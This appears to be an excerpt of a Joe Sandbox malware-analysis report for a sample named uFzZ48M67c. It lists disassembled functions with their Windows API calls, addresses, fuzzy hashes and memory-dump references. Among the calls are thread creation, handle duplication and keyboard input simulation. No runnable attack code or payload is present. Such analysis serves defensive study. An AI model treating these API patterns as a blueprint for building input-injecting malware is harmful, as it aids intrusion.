                                          • Opcode Fuzzy Hash: 4b9553ffb05bb61a93765f5dfb1e0a66324b60b4a152289245f0c89c86547163
                                          • Instruction Fuzzy Hash: 5D5184719002099BCB10EF51C982AEFB779EF84308F10856BF905B7281D779AE45CBE9
                                          APIs
                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                          • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                          • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                          • DeleteObject.GDI32(?), ref: 00455736
                                          • DeleteObject.GDI32(?), ref: 00455744
                                          • DestroyIcon.USER32(?), ref: 00455752
                                          • DestroyWindow.USER32(?), ref: 00455760
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                          • String ID:
                                          • API String ID: 2354583917-0
                                          • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                          • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                          • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                          • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                          • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                          • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                          • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                          APIs
                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                          • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                          • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                          • EnableWindow.USER32(?,00000001), ref: 00448B72
                                          • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                          • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                          • EnableWindow.USER32(?,00000001), ref: 00448C09
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Window$Enable$Show$MessageMoveSend
                                          • String ID:
                                          • API String ID: 896007046-0
                                          • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                          • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                          • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                          • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                          APIs
                                          • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                          • GetFocus.USER32 ref: 00448ACF
                                          • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                          • EnableWindow.USER32(?,00000001), ref: 00448B72
                                          • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                          • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                          • EnableWindow.USER32(?,00000001), ref: 00448C09
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Window$Enable$Show$FocusMessageSend
                                          • String ID:
                                          • API String ID: 3429747543-0
                                          • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                          • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                          • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                          • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                          • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                          • __swprintf.LIBCMT ref: 0045D4E9
                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: ErrorMode$InformationVolume__swprintf
                                          • String ID: %lu$\VH
                                          • API String ID: 3164766367-2432546070
                                          • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                          • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                          • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                          • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                          APIs
                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                          • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                          • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: Msctls_Progress32
                                          • API String ID: 3850602802-3636473452
                                          • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                          • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                          • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                          • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                          • String ID:
                                          • API String ID: 3985565216-0
                                          • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                          • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                                          • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                          • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                                          APIs
                                          • _malloc.LIBCMT ref: 0041F707
                                            • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                            • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                            • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                          • _free.LIBCMT ref: 0041F71A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: AllocateHeap_free_malloc
                                          • String ID: [B
                                          • API String ID: 1020059152-632041663
                                          • Opcode ID: 5ae3695c4899d33c0c5016eec090c96391fe5f6cd2bec6778d3ea2d81492c429
                                          • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                          • Opcode Fuzzy Hash: 5ae3695c4899d33c0c5016eec090c96391fe5f6cd2bec6778d3ea2d81492c429
                                          • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                          APIs
                                          • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                                          • __calloc_crt.LIBCMT ref: 00413DB0
                                          • __getptd.LIBCMT ref: 00413DBD
                                          • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                                          • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                                          • _free.LIBCMT ref: 00413E07
                                          • __dosmaperr.LIBCMT ref: 00413E12
                                            • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                          • String ID:
                                          • API String ID: 155776804-0
                                          • Opcode ID: 2348856d60b5f8ae92a3c52096df9563f03509e61ea6f3f8618797eae5d9925f
                                          • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                          • Opcode Fuzzy Hash: 2348856d60b5f8ae92a3c52096df9563f03509e61ea6f3f8618797eae5d9925f
                                          • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                          APIs
                                            • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                            • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                          • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                          • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                          • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                          • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                          • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                          • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                          • String ID:
                                          • API String ID: 1957940570-0
                                          • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                          • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                          • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                          • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                          APIs
                                          • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                            • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                            • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                          • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                            • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                          • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                          • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                          • ExitThread.KERNEL32 ref: 00413D4E
                                          • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                          • __freefls@4.LIBCMT ref: 00413D74
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                          • String ID:
                                          • API String ID: 259663610-0
                                          • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                          • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                                          • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                          • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                                          APIs
                                          • GetClientRect.USER32(?,?), ref: 004302E6
                                          • GetWindowRect.USER32(00000000,?), ref: 00430316
                                          • GetClientRect.USER32(?,?), ref: 00430364
                                          • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                          • GetWindowRect.USER32(?,?), ref: 004303C3
                                          • ScreenToClient.USER32(?,?), ref: 004303EC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Rect$Client$Window$MetricsScreenSystem
                                          • String ID:
                                          • API String ID: 3220332590-0
                                          • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                          • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                          • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                          • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: _malloc_wcslen$_strcat_wcscpy
                                          • String ID:
                                          • API String ID: 1612042205-0
                                          • Opcode ID: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                          • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                          • Opcode Fuzzy Hash: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                          • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: _memmove_strncmp
                                          • String ID: >$U$\
                                          • API String ID: 2666721431-237099441
                                          • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                          • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                          • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                          • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                          APIs
                                          • GetKeyboardState.USER32(?), ref: 0044C570
                                          • SetKeyboardState.USER32(00000080), ref: 0044C594
                                          • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                          • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                          • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                          • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: MessagePost$KeyboardState$InputSend
                                          • String ID:
                                          • API String ID: 2221674350-0
